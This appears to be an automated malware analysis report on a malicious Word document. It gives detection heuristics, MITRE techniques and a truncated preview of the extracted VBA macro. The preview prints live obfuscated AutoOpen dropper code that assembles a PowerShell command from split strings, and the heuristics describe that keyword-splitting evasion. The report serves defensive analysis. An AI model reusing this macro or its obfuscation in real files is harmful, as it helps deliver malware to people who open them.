MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes obfuscation techniques and calls to `Shell()` and `CreateObject()` to likely download and execute a second-stage payload. The heuristic `OLE_VBA_SPLIT_KEYWORD_OBFUSCATION` specifically indicates the reassembly of dangerous API names, such as 'scripting.filesystemobject', which is a strong indicator of malicious intent.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-7119420-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7119420-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 248096 bytes |
SHA-256: bf12cffe3511c90aeb6856fd85e13352d8be8043a73229f02215bb2f51026206 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private Function heer()
heer = "iwefwfnwoiun"
MsgBox wiefu
End Function
Sub AutoOpen()
Const ih_lagw = True
Const txhtbbscl = False
Const vhadxrjmg = True
Const afalj = False
Const k_oyvo = False
Const ioih_ffxk0 = True
Const avqsa = False
Const c_vpyfg = False
Select Case "uuje"
Case "uuje"
amsoi = "$abgomyxwvevfsrlo"
End Select
Const hpf_ue = True
Select Case 87 + 41
Case edtquf
Const oyozdxho63 = True
Case 128
rruza = "c_asnivm='.Dow"
Const skgqsinfi = True
Const cintw = True
amsoi = mqml_yoiugv + amsoi + rruza
Case kymmwpiy
Const jvsgcljb = True
Const cmgbckd = True
Const oiudce = False
Const zcu_ezc = False
Const bisiemg = False
End Select
If 1798 <= 1948 Then
amsoi = amsoi + "n';$kceicqujfcyxzeofoiwrfwoe='em';$auyearkz_mpgdk_"
ElseIf 10 - 50 = 60 Then
Const xpfueo = False
Const bprnyii = True
Const ezggafv = True
Const unpeqbd = True
Const yyroo = False
Const cifnog = True
Else
End If
Select Case 47 + 12
Case 59
iylkvho = "oo_bx_jg"
Const uydzie = False
amsoi = ofcyfovc_ofd + amsoi + iylkvho + cajcvrl
End Select
If 4758 <= 3797 Then
Const ouifno = True
Const jjrswye = False
Const eeua6 = False
Const tueucs = False
ElseIf 88 - 45 = 43 Then
znmvgrm = "kkvdunluzouoxg_aqjrd='"
amsoi = zgeuwa + amsoi + znmvgrm + untcdtackcxp
Else
Const mweuhvy = True
Const jbycyfs = False
Const ncdxu_gc = True
Const ieuae22 = True
Const wuyksf4 = True
Const iifl = False
Const yaxnx = False
Const a_ozta = True
End If
Const ao_jml = False
Const sicthyv = True
Select Case 98 + 45
Case 143
uiey_gfbc0 = aobday + amsoi
Const ebcvre = True
yiyiuld = "imzw';$uyorw_unebxvmip"
uiey_gfbc0 = uiey_gfbc0 + yiyiuld
Case ipuuge
Const luogs = True
Const yjebk8 = True
End Select
Const xsrdxyn = False
Const f_zut_tp = True
Select Case 81 + 89
Case 6853
Const kzdvbraa1 = True
Const eaptaydn = True
Case 170
rlieburw = "gbksiiadwvdetnyh_i_s='"
uiey_gfbc0 = uiey_gfbc0 + rlieburw + kfoheea_u
End Select
If 94 - 66 = 28 Then
xwlbkioyiqb = "(1){';$epwegiuygvan"
uiey_gfbc0 = uiey_gfbc0 + xwlbkioyiqb
ElseIf 100 * 83 = 781 Then
Else
Const tiuyo2 = True
Const meokyt = True
Const jctbyl = True
Const gdgnohm = True
Const aasstqo = False
End If
Const slvplef = True
Select Case "l_wlkgas"
Case "l_wlkgas"
wylpe = "lbxqip='19/7';$nuwarvqzcaek"
uiey_gfbc0 = lo_qrpvol + uiey_gfbc0 + wylpe
End Select
Const ayuctrctk = False
Const b_i_ojzqi = True
If 8891 >= 4932 Then
ncccflwt = "vkvinrngskut_eiqjhckxcqx='Byp"
uiey_gfbc0 = beae + uiey_gfbc0 + ncccflwt
End If
Const ydom = False
Const pdmbi_iolt = False
Select Case "uias"
Case evkrbtez
Const glgxgct_kv = True
Const uuplpgy = True
Case "uias"
yzeuu = "as';$npqcuf_fosds"
Const driy_yi = False
uiey_gfbc0 = yuaafrqx23 + uiey_gfbc0 + yzeuu
Case uriollz
Const qyt_hv = True
Const qiargqhk = True
End Select
If 9718 >= 6536 Then
rtfwndh = "ve_rzywa"
uiey_gfbc0 = cifoozm + uiey_gfbc0 + rtfwndh
ElseIf 86 - 42 = 128 Then
Const oqqkr_ra = False
Const yiaytp8 = True
Const j_ayzny = False
Const knggyuo = False
Const oimnet = True
Else
End If
If 8963 <= 13624 Then
etezshmkq_p = "_w"
uiey_gfbc0 = n_iqzygv + uiey_gfbc0 + etezshmkq_p + iztyxb
End If
Const smyvkdmbqa = True
Select Case 29 + 42
Case 71
uafhaq = axxnse + uiey_gfbc0
Const ikepuu = True
Const oeui_tsu = False
oeslmtkrbb = "gcupi='Syste';$at"
uafhaq = uafhaq + oeslmtkrbb
End Select
Const onsxlf_zba = True
Const zdgheovjw = False
If 6614 >= 5490 Then
nlqyo27 = Environ("SystemRoot")
End If
Const vqgpucni = True
Select Case "sytqyggj"
Case "sytqyggj"
espivao = "ex_sxyttmsbpr"
Const ufjyjl = True
Const ea_xjlwhpt = True
uafhaq = fdhyk + uafhaq + espivao + fz_edzuy_xyqr
End Select
Const ey_uibe = F
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.